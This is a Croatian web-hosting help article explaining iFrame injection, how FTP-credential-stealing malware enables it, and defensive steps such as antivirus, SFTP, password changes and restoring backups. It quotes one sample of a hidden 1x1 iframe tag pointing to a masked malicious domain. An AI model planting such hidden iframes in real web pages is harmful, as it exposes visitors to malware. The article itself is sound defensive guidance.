iFrame Injection

U posljednje vrijeme sve je više iFrame Injection napada. Hackeri ubacuju u web stranice iframe tag koji učitava web stranice sa malicioznim kodom. U HTML datoteke se ubacuje kod tipa:

<iframe src=”http://********.com/?click=8F9DA” width=1 height=1 style=”visibility:hidden;position:absolute”>

U Iframe-u se učitavaju web stranice koje najčešće pokušavaju inficirati posjetiteljevo računalo. Ako posjetitelj ima instaliran antivirusni software web stranica mu neće biti prikazana. Ako pretraživači detektiraju da se na web stranicama nalazi virus prestati će ih indeksirati, blokirati pristup na njih i izbaciti iz rezultata pretraživanja.

Kako mogu hackeri ubaciti svoj kod u moje web stranice?
Trenutno se na internetu širi virus koji prati FTP promet na inficiranom računalu te izolira korisničko ime i lozinku za pristup na FTP. Korisničko ime i lozinka se šalju hackeru te ih on dalje koristi za pristup na FTP server i izmjenu datoteka na serveru. Hackeri koriste napredne skripte koje mogu u kratkom vremenu ubaciti maliciozni kod u tisuće web stranica.

Kako se zaštiti od iFrame Injection napada?
Primarno je zaštiti računalo od virusa najnovijim antivirusnim softwareom. Antivirus najčešće prepoznaje takve viruse i ne dopušta inficiranje računala. Za zaštitu računala preporučujemo odličan besplatni antivirus AVG Free. Kada instalirate antivirus obavezno ga konstantno nadograđujte najnovijim definicijama.

Preporučujemo da za transfer podataka umjesto FTP-a koristite SFTP (Secure File Transfer Protocol). Ako koristite SFTP promet između Vašeg računala i servera je kriptiran pa virusi ne mogu učitati podatke za pristup na server. Svi naši serveri podržavaju SFTP protokol a da bi se mogli spajati na njega trebate SFTP klijent. Najpopularniji je WinSCP . Sve više modernih FTP klijenata podržava SFTP protokol pa pročitajte dokumentaciju vašeg FTP klijenta. Podaci za pristup na SFTP su isti kao i za FTP, samo se koristi port 22.

Podatke za pristup na server čuvajte na sigurnom i ne dajte ih nikome. Ne spajajte se na FTP server sa javnih računala jer nikad ne znate što je instalirano na njima.

Periodički mijenjajte lozinke za pristup na server. Preporučujemo da ih mijenjate svaki mjesec.

Što napraviti ako je moj site zaražen?
Odmah instalirajte antivirusni software na sva računala sa kojih se spajate na server i očistite ih od virusa. Kada budete 100% sigurni da su računala očišćena, prijavite se na Cpanel i promijenite lozinku za pristup. Ako je u web stranice ubačen kod hackeri imaju lozinku za pristup na server i ako je ne promijenite oni će se i dalje spajati na server te ubacivati svoj kod u web stranice. Provjerite web stranice na serveru i pokušajte sa njih izbrisati ubačeni kod. Ako imate backup web stranica na računalu preporučujemo da izbrišete sve web stranice sa servera i ponovo ih postavite iz backupa. Ako nemate backup kontaktirajte nas pa ćemo mi vratiti Vaše web stranice iz našeg backupa. Za transfer web stranica na server umjesto FTP-a koristite SFTP.

  • 17 Bu dökümanı faydalı bulan kullanıcılar:
Bu cevap yeterince yardımcı oldu mu?

İlgili diğer dökümanlar

Deblokada IP adrese

Na svim serverima postoji zaštita koja automatski blokira IP adrese s kojih se netko...

Brute force - pokušaj ulaza na server s krivim podacima

Ukoliko se netko pokušava logirati na server (na pr. na Email, FTP ..) s krivim...

SPAM - prevara - ne odgovarajte na Email subjekta ATTENTION: Important notice..

Ukoliko dobijete Email s ponudim koja izgleda kao ponuda za produljenje domene - ne nasjedajte!...

Zaštita računala i web stranica

Zaštita računala, web stranica, emailova je vrlo široka, kompleksna tema. Ovdje iznosimo tek...

Kako promijeniti cPanel i FTP lozinku

Početnu cPanel (ujedno i FTPS) lozinku generirali smo mi kod kreiranja Vašeg paketa, a nakon toga...